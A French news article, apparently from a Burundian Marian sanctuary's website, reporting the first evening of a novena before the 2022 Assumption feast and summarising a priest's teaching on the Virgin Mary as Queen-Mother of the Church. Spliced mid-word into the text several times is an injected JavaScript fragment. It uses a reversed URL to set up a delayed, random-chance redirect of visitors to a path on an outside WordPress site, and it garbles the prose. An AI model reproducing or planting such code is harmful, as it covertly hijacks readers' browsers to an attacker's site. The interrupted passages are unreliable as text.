La solennité de l’assomption de la Vierge Marie est la première des célébrations auxquelles le Sanctuaire de la Reine de la paix et la réconciliation de Mont Sion Gikungu consacre une préparation particulière et bien mûrie. Après deux réunions du Conseil Élargi des Pèlerins tenues aux mois de juillet et août pour préparer une neuvaine et une veillée qui toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doivent précéder à cette solennité, nous voilà déjà à neuf jours seulement de cette cérémonie grandiose. En date du 6 de ce mois, nous débutons une neuvaine qui se clôture à la veille du jour attendu. Pour que cette prière se déroule dans des conditions où tout le monde sent que sa participation et son implication sont impliquées, le rectorat a bien voulu que tous les groupes, chorales et commissions fassent prier tour à tour. Selon le plan établi pour la prière, la neuvaine débute chaque fois à 18h par des chants à la Vierge Marie, une tâche qui revient aux jeunes du Renouveau Charismatique catholique. La prière avec le chapelet avec les mystères du jour succède aux chants. De 18h45 à 19h15, il est prévu un enseignement toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dont le rectorat assure la prédication. Le quart d’heure qui suit l’enseignement du jour est prévu pour la méditation, la prière de couronnement de la Vierge Marie et la bénédiction qui clôt la séance. Le thème central de toute la neuvaine est celui retenu pour l’année pastorale 2021-2022, ‘Avec la Vierge, édifions l’Église-Famille pour la guérison des mémoires’. Mais il y a des thèmes secondaires qui guident l’enseignement de chaque jour.
Ce samedi 6 août 2022, l’enseignement a été dispensé par le Père Floribert KANEZA, actuel Vice-Recteur du sanctuaire, sous le thème ‘La Vierge Marie, Reine-Mère de l’Église’. Dans sa prédication, Père Floribert a d’abord souhaité la paix à tous las pèlerins fidèles à la tradition de tout faire pour la bonne passation de la solennité de l’Assomption, à leurs familles et toutes les personnes à dévotion mariale. La Parole de Dieu qui a guidé de référence a été tirée de l’Évangile selon saint Jean (19,25-27). Nous avons entendu qu’au pied de la croix se trouvaient Marie et le disciple que Jésus aimait. Cette Mère a durement souffert en contemplant son Fils souffrir sa passion sur la Croix. Mais avant cela, nous savons qu’elle a obéi au Saint-Esprit. Suite à cette obéissance, elle a conçu et enfanté le Fils de Dieu. Les personnes qui ont soif de Jésus et qui vont à sa suite trouvent l’accompagnement de cette tendre Mère, comme elle a aussi bien accompagné son Fils.
Jésus a remis sa mère entre les mains et sous la protection de l’apôtre Jean. Le voici toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donc recevoir un autre apostolat de veiller sur la Mère de Jésus en plus de celui de proclamer l’Evangile du salut jusqu’à l’extrémité de la terre. A la question de savoir pourquoi la Vierge Marie veille sur nous, la réponse est qu’elle le fait parce qu’elle est la Mère de Dieu et toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donc la Mère de toute l’Église. Les parents sont contents quand ils voient que l’éducation de leurs enfants est conforme à leur volonté et que ces derniers deviennent importants et nécessaires dans la vie des familles et de leur pays. Nous ne toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doutons pas qu’il y ait une relation entre un parent et la Reine-mère. Un parent peut accepter d’assurer la survie et l’éducation d’un enfant qui n’est pas proprement le sien biologiquement. Notre vie et notre éducation sont assuré par la Vierge Marie car nous sommes ses enfants et ceux de l’Église.
Le rôle de la Reine-mère est d’assurer certaines fonctions en aidant son Fils dans la direction du pays. Jésus est Fils du Roi car il est issu de la famille du roi David tel que l’Évangile selon Matthieu nous le dit. La royauté de Jésus est ensuite manifestée dans l’appellation ‘ Christ’ qui signifie ‘celui qui a été oint’. Nous sommes appelés à couronner cette Mère qui a enfanté Jésus pour nous. Notre souhait est qu’elle soit la Reine de nos foyers. Bien de fidèles ont plein de témoignages qui nous convaincraient que toute personne qui se confie à la Vierge Marie se retrouve ses prières exaucées. Marie règne au ciel tout en étant Reine de l’Église. Elle n’est toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donc pas une femme comme tant d’autres tel que certaines croyances le font savoir. Elle a le droit et le devoir d’intercéder pour nous. L’exemple est ce qu’elle a fait quand elle était invitée aux noces de Cana. Voilà pourquoi nous sommes invités à lui obéir. Ne soyons toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donc pas dupés : ‘Dieu a voulu nous associer dans son plan de salut via la Vierge Marie. Elle est notre Reine et celle de toute l’Église’, a conclu son enseignement le Père Floribert KANEZA.
Signalons que les sous-thèmes pour les autres jours sont :
- La Vierge Marie, Reine des foyers et des familles ;
- La Vierge Marie, Reine des croyants ;
- La Vierge Marie, Reine des malheureux ;
- La Vierge Marie, une Mère de confiance ;
- La Vierge Marie, Reine de la paix ;
- La Vierge Marie, Reine de la réconciliation.
Le septième jour est prévu une atoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doration silencieuse et une confession. Au neuvième jour, il y aura une messe de clôture de la neuvaine à 17 heures. Celle-ci sera suivie par une veillée de prière de toute la nuit.
NYANDWI M.